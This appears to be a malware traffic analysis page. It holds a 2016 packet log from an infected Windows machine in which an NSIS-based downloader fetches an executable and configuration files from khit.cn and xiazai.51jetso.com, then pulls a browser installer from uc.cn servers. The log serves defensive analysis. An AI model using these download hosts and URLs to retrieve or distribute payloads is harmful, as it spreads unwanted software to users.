khit.cn Unknown Browser Malware Traffic Analysis PCAP File Download Sample

 

https://www.virustotal.com/en/file/96fb78cf6f9420bf83e9f3a730237500401a861859189a580455a883f6a0d33f/analysis/1470998826/

 

2016-10-23 01:19:15.986646 IP 192.168.1.102.58875 > 203.130.61.232.80: Flags [P.], seq 0:298, ack 1, win 256, length 298: HTTP: GET /359/setup_120.exe HTTP/1.1
E..RW.@…._…f..=….P…6..?@P….?..GET /359/setup_120.exe HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: xiazai.51jetso.com
Connection: Keep-Alive

2016-10-23 01:19:25.769716 IP 192.168.1.102.58878 > 220.243.237.153.80: Flags [P.], seq 0:98, ack 1, win 256, length 98: HTTP: GET /soft/azbconfig.ini HTTP/1.0
E…Y.@….-…f…….PQ……0P…….GET /soft/azbconfig.ini HTTP/1.0
Host: khit.cn
User-Agent: NSISDL/1.2 (Mozilla)
Accept: */*

2016-10-23 01:19:25.817228 IP 192.168.1.102.58878 > 220.243.237.153.80: Flags [.], ack 435, win 254, length 0
E..(Y.@……..f…….PQ…….P………….
2016-10-23 01:19:25.833005 IP 192.168.1.102.58878 > 220.243.237.153.80: Flags [F.], seq 98, ack 435, win 254, length 0

E..(Y.@……..f…….P.Ie4….P….R……..
2016-10-23 01:19:25.910548 IP 192.168.1.102.58879 > 220.243.237.153.80: Flags [P.], seq 0:105, ack 1, win 256, length 105: HTTP: GET /soft/kp2configuration.ini HTTP/1.0
E…Y.@….!…f…….P.Ie4….P…d…GET /soft/kp2configuration.ini HTTP/1.0
Host: khit.cn
User-Agent: NSISDL/1.2 (Mozilla)
Accept: */*

2016-10-23 01:19:26.675653 IP 192.168.1.102.58879 > 220.243.237.153.80: Flags [.], ack 2921, win 256, length 0
E..(Y.@……..f…….P.Ie…..P………….
2016-10-23 01:19:26.676876 IP 192.168.1.102.58879 > 220.243.237.153.80: Flags [.], ack 4771, win 256, length 0

E..(8.@….5…f{……Pc..q..GeP….N……..
2016-10-23 01:21:31.849083 IP 192.168.1.102.58885 > 123.150.188.19.80: Flags [P.], seq 0:111, ack 1, win 256, length 111: HTTP: GET /pcbrowser/down.php?pid=4725 HTTP/1.0
E…8.@……..f{……Pc..q..GeP…m…GET /pcbrowser/down.php?pid=4725 HTTP/1.0
Host: down2.uc.cn
User-Agent: NSISDL/1.2 (Mozilla)
Accept: */*

2016-10-23 01:21:32.109301 IP 192.168.1.102.58885 > 123.150.188.19.80: Flags [.], ack 249, win 255, length 0
E..(8.@….3…f{……Pc…..H]P………….
2016-10-23 01:21:32.113814 IP 192.168.1.102.58885 > 123.150.188.19.80: Flags [F.], seq 111, ack 249, win 255, length 0

E..(f,@….^…fB..p…P.F……P…W………
2016-10-23 01:21:32.582991 IP 192.168.1.102.58886 > 66.198.178.112.80: Flags [P.], seq 0:144, ack 1, win 256, length 144: HTTP: GET /down/4725/Browser_V5.7.16173.12_r_4725_(Build1610201330).exe HTTP/1.0
E…f-@……..fB..p…P.F……P…….GET /down/4725/Browser_V5.7.16173.12_r_4725_(Build1610201330).exe HTTP/1.0
Host: umcdn.uc.cn
User-Agent: NSISDL/1.2 (Mozilla)
Accept: */*